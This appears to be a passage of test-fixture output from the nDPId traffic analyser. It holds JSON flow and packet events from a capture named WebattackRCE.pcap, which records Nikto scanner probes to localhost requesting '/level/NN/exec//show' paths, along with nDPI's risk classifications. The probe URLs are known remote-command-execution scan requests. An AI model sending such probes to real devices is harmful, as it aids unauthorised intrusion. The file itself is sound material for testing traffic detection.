+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1576420277648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277648,"pkt":"AAAAAAAAAAAAAAAACABFAADIfG5AAEAGv79\/AAABfwAAAcZOH5Bk90VplsnARIAYAED+vAAAAQEICp1m\/ridZv64R0VUIC9sZXZlbC81NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1576420277650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277650,"pkt":"AAAAAAAAAAAAAAAACABFAADIGk5AAEAGIeB\/AAABfwAAAcZQH5A3JSNJK84\/noAYAED+vAAAAQEICp1m\/rmdZv65R0VUIC9sZXZlbC81NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1576420277657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277657,"pkt":"AAAAAAAAAAAAAAAACABFAADIqGlAAEAGk8R\/AAABfwAAAcZSH5BRNZFiv2NJXIAYAED+vAAAAQEICp1m\/sGdZv7AR0VUIC9sZXZlbC81Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1576420277658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277658,"pkt":"AAAAAAAAAAAAAAAACABFAADIKidAAEAGEgd\/AAABfwAAAcZUH5DRhBMk1ziDVIAYAED+vAAAAQEICp1m\/sKdZv7CR0VUIC9sZXZlbC81Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDQpDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1576420277660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277660,"pkt":"AAAAAAAAAAAAAAAACABFAADI7vpAAEAGTTN\/AAABfwAAAcZWH5Ba4NgASBBLBYAYAED+vAAAAQEICp1m\/sSdZv7ER0VUIC9sZXZlbC81OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1576420277662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277662,"pkt":"AAAAAAAAAAAAAAAACABFAADIlWJAAEAGpst\/AAABfwAAAcZYH5ApQaxoF8oWWYAYAED+vAAAAQEICp1m\/sadZv7GR0VUIC9sZXZlbC81OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1576420277663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277663,"pkt":"AAAAAAAAAAAAAAAACABFAADIGkpAAEAGIeR\/AAABfwAAAcZaH5C0PSNBlakojYAYAED+vAAAAQEICp1m\/sedZv7HR0VUIC9sZXZlbC82MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1576420277667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277667,"pkt":"AAAAAAAAAAAAAAAACABFAADIoR1AAEAGmxB\/AAABfwAAAcZcH5BUypgTdH6XP4AYAED+vAAAAQEICp1m\/sudZv7LR0VUIC9sZXZlbC82MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1576420277669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277669,"pkt":"AAAAAAAAAAAAAAAACABFAADI7qNAAEAGTYp\/AAABfwAAAcZeH5CzGNepEFgF6YAYAED+vAAAAQEICp1m\/s2dZv7NR0VUIC9sZXZlbC82Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1576420277670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277670,"pkt":"AAAAAAAAAAAAAAAACABFAADI1RxAAEAGZxF\/AAABfwAAAcZgH5DKr+wUPhtD5IAYAED+vAAAAQEICp1m\/s6dZv7OR0VUIC9sZXZlbC82My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1576420277675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277675,"pkt":"AAAAAAAAAAAAAAAACABFAADI4N9AAEAGW05\/AAABfwAAAcZiH5DpddnYHCFGp4AYAED+vAAAAQEICp1m\/tOdZv7SR0VUIC9sZXZlbC82NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTEpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}} 
